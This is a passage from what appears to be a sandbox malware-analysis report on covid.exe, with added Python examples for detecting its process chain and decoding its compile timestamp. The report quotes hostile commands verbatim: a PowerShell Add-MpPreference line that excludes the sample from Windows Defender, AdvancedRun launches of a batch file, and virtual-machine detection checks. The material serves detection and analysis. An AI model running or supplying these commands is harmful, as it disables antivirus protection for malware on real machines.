Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/search/
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_02FFCF08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_02FF2780
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_02FFCEF8
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: String function: 0040B550 appears 50 times
Source: covid.exe | Static PE information: invalid certificate
Source: AdvancedRun.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: covid.exe, 00000000.00000000.229590420.0000000000462000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameahmed.exe, vs covid.exe
Source: covid.exe | Binary or memory string: OriginalFilenameahmed.exe, vs covid.exe
Source: classification engine | Classification label: mal68.evad.winEXE@15/17@1/2
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 7_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\Desktop\covid.exe | File created: C:\Users\user\MhpbFtoGWNhTPjKfwzuGgRGxjpGzfVWGJwHUxEjlTdnPIXFwm
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
Source: C:\Users\user\Desktop\covid.exe | File created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec
Source: covid.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\covid.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\covid.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\covid.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\covid.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\covid.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\covid.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: covid.exe | Virustotal: Detection: 40%
Source: covid.exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\covid.exe | File read: C:\Users\user\Desktop\covid.exe:Zone.Identifier
Source: unknown | Process created: C:\Users\user\Desktop\covid.exe 'C:\Users\user\Desktop\covid.exe'
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe | Process created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224
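The process chain above is the part of this report most worth turning into a detection: the sample drops a copy of NirSoft's AdvancedRun into a GUID-named Temp directory (once under its own name, once renamed to a GUID; both carry the AdvancedRun.pdb path), uses it to launch test.bat and then the sample itself with /RunAs 8, and in parallel runs 32-bit PowerShell to add a Defender exclusion for its own path. The following is an added example, not part of the Joe Sandbox report and not the sample's code: a small Python triage function run over process-creation events constructed from the "Process created" lines above. The ProcessEvent structure, the tag names and the regular expressions are my own; the AdvancedRun switch names (/EXEFilename, /RunAs, /Run, /SpecialRun) and the Add-MpPreference command line are exactly those shown in the report, and the meaning of the /RunAs value is not asserted here.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Hex GUID as used for the dropper's Temp sub-directories and for the renamed AdvancedRun copy.
GUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
TEMP_GUID_DIR = re.compile(r"\\AppData\\Local\\Temp\\" + GUID + r"\\", re.I)
GUID_NAMED_EXE = re.compile(r"\\" + GUID + r"\.exe$", re.I)
# Defender tampering through the MpPreference cmdlets (exclusions or the real-time protection switch).
DEFENDER_TAMPER = re.compile(
    r"\b(Add|Set)-MpPreference\b.*?-(ExclusionPath|ExclusionProcess|ExclusionExtension|DisableRealtimeMonitoring)\b",
    re.I)
# AdvancedRun launch syntax as it appears in the report: /EXEFilename ... /RunAs <n> ... /Run
ADVANCEDRUN_LAUNCH = re.compile(r"/EXEFilename\s.*?/RunAs\s+\d+.*?/Run\b", re.I)
# Second stage of the same tool, always seen as a child of itself: /SpecialRun <hex> <pid>
ADVANCEDRUN_SPECIAL = re.compile(r"/SpecialRun\s+[0-9a-f]+\s+\d+", re.I)


@dataclass
class ProcessEvent:
    parent: str   # image path of the creating process
    image: str    # image path of the created process
    cmdline: str  # command line of the created process


def classify(ev: ProcessEvent) -> list[str]:
    """Return the detection tags (my own names) that apply to one process-creation event."""
    tags = []
    if ev.image.lower().endswith("\\powershell.exe") and DEFENDER_TAMPER.search(ev.cmdline):
        tags.append("defender-exclusion")
    if ADVANCEDRUN_LAUNCH.search(ev.cmdline):
        tags.append("advancedrun-launch")
    if ADVANCEDRUN_SPECIAL.search(ev.cmdline) and ev.parent.lower() == ev.image.lower():
        tags.append("advancedrun-self-relaunch")
    if TEMP_GUID_DIR.search(ev.image):
        tags.append("temp-guid-dir")
    if GUID_NAMED_EXE.search(ev.image):
        tags.append("guid-named-exe")
    # A 32-bit parent asked for System32\...\powershell.exe and got SysWOW64 through file-system redirection.
    if "\\syswow64\\" in ev.image.lower() and "\\system32\\" in ev.cmdline.lower():
        tags.append("wow64-redirected")
    return tags


def triage(events: list[ProcessEvent]) -> list[tuple[str, list[str]]]:
    """Keep only the events that earned at least one tag, in input order."""
    findings = []
    for ev in events:
        tags = classify(ev)
        if tags:
            findings.append((ev.image, tags))
    return findings


TMP1 = r"C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec"
TMP2 = r"C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661"
SAMPLE = r"C:\Users\user\Desktop\covid.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Constructed from the "Process created" lines of the report: (parent, image, command line).
SAMPLE_EVENTS = [
    ProcessEvent(SAMPLE, TMP1 + r"\AdvancedRun.exe",
                 f"'{TMP1}\\AdvancedRun.exe' /EXEFilename '{TMP1}\\test.bat' /WindowState ''0'' "
                 "/PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run"),
    ProcessEvent(TMP1 + r"\AdvancedRun.exe", TMP1 + r"\AdvancedRun.exe",
                 f"'{TMP1}\\AdvancedRun.exe' /SpecialRun 4101d8 3192"),
    ProcessEvent(SAMPLE, PS32,
                 r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference "
                 r"-ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force"),
    ProcessEvent(SAMPLE, TMP2 + r"\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe",
                 f"'{TMP2}\\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename '{SAMPLE}' "
                 "/WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run"),
    ProcessEvent(PS32, r"C:\Windows\System32\conhost.exe",
                 r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

if __name__ == "__main__":
    for image, tags in triage(SAMPLE_EVENTS):
        print(f"{', '.join(tags):55} {image}")
```

In production the same function takes (ParentImage, Image, CommandLine) from Sysmon event 1 or Security event 4688 with command-line auditing enabled; the conhost.exe event is kept in the sample set to show that ordinary children of PowerShell earn no tag.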
Source: C:\Users\user\Desktop\covid.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: covid.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: covid.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb | source: AdvancedRun.exe, 00000005.00000000.268968190.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr
Source: covid.exe | Static PE information: 0xFBC3D040 [Wed Nov 7 21:27:28 2103 UTC]
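The compile timestamp 0xFBC3D040 above decodes to 7 November 2103, which is what triggers the "Binary contains a suspicious time stamp" signature. As an added example that is not part of the report, the following Python reads IMAGE_FILE_HEADER.TimeDateStamp out of raw PE bytes and rates it against the time the sample was first observed. The stub PE header builder is constructed sample input, and the observation time is an assumption (the page does not state its analysis date; the embedded URLs date from March 2021). One caveat a practitioner should keep in mind: covid.exe is a .NET assembly (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR is present), and deterministic builds of the .NET compilers write a hash-derived value rather than a time into this field, so an impossible TimeDateStamp on a .NET binary is a prompt to look further, not proof of deliberate tampering on its own.

```python
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def read_timedatestamp(pe: bytes) -> int:
    """Return IMAGE_FILE_HEADER.TimeDateStamp from the raw bytes of a PE file."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)        # IMAGE_DOS_HEADER.e_lfanew
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # IMAGE_FILE_HEADER follows the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    (stamp,) = struct.unpack_from("<I", pe, e_lfanew + 8)
    return stamp


def decode_timedatestamp(stamp: int) -> datetime:
    """TimeDateStamp is an unsigned 32-bit count of seconds since the Unix epoch, taken as UTC."""
    if not 0 <= stamp <= 0xFFFFFFFF:
        raise ValueError("TimeDateStamp is a 32-bit field")
    return EPOCH + timedelta(seconds=stamp)


def timestamp_verdict(stamp: int, observed_at: datetime,
                      slack: timedelta = timedelta(days=1)) -> str:
    """'zero' (field cleared), 'future' (later than first observation plus slack) or 'plausible'."""
    if stamp == 0:
        return "zero"
    if decode_timedatestamp(stamp) > observed_at + slack:
        return "future"
    return "plausible"


def make_stub_pe(stamp: int) -> bytes:
    """Constructed minimal MZ + PE signature + IMAGE_FILE_HEADER; sample input only, not a loadable image."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                 # e_lfanew: PE header right after the DOS header
    # Machine=i386, NumberOfSections=3, TimeDateStamp, PointerToSymbolTable=0, NumberOfSymbols=0,
    # SizeOfOptionalHeader=0xE0, Characteristics=EXECUTABLE_IMAGE|32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x014C, 3, stamp, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff


REPORTED_STAMP = 0xFBC3D040                                 # value shown in this report for covid.exe
# Assumed observation time: the report does not state its analysis date.
OBSERVED_AT = datetime(2021, 4, 1, tzinfo=timezone.utc)

if __name__ == "__main__":
    stamp = read_timedatestamp(make_stub_pe(REPORTED_STAMP))
    print(f"TimeDateStamp 0x{stamp:08X} = {decode_timedatestamp(stamp):%Y-%m-%d %H:%M:%S} UTC "
          f"-> {timestamp_verdict(stamp, OBSERVED_AT)}")
```

Running it against a real file is `read_timedatestamp(open(path, "rb").read())`; the one-day slack absorbs clock skew between the build machine and the sandbox without hiding a timestamp that is decades out.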
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040B50D push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 7_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 7_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 7_2_0040B50D push ecx; ret
Source: C:\Users\user\Desktop\covid.exe | File created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe
Source: C:\Users\user\Desktop\covid.exe | File created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\covid.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\covid.exe | Process information set: NOOPENFILEERRORBOX (47 identical entries)
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\covid.exe WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\covid.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\covid.exe File opened / queried: C:\WINDOWS\SysWOW64\drivers\vmmouse.sys
Source: C:\Users\user\Desktop\covid.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
Source: C:\Users\user\Desktop\covid.exe File opened / queried: C:\WINDOWS\SysWOW64\drivers\vmhgfs.sys
Source: C:\Users\user\Desktop\covid.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\covid.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\covid.exe File opened / queried: C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\covid.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
Source: C:\Users\user\Desktop\covid.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\covid.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4853
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2097
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5103
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2140
Source: C:\Users\user\Desktop\covid.exe TID: 5756 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\covid.exe TID: 5744 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336 | Thread sleep count: 4853 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6472 | Thread sleep count: 52 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6340 | Thread sleep count: 2097 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6980 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6968 | Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Users\user\Desktop\covid.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\covid.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000010.00000003.423793477.0000000004F7B000.00000004.00000001.sdmp | Binary or memory string: Hyper-V
Source: powershell.exe, 00000010.00000003.423793477.0000000004F7B000.00000004.00000001.sdmp | Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: covid.exe, 00000000.00000003.236324097.0000000005B2B000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW*L
Source: covid.exe, 00000000.00000003.236350637.0000000000C2F000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: AdvancedRun.exe, 00000005.00000002.281611272.0000000000628000.00000004.00000020.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\covid.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\covid.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192
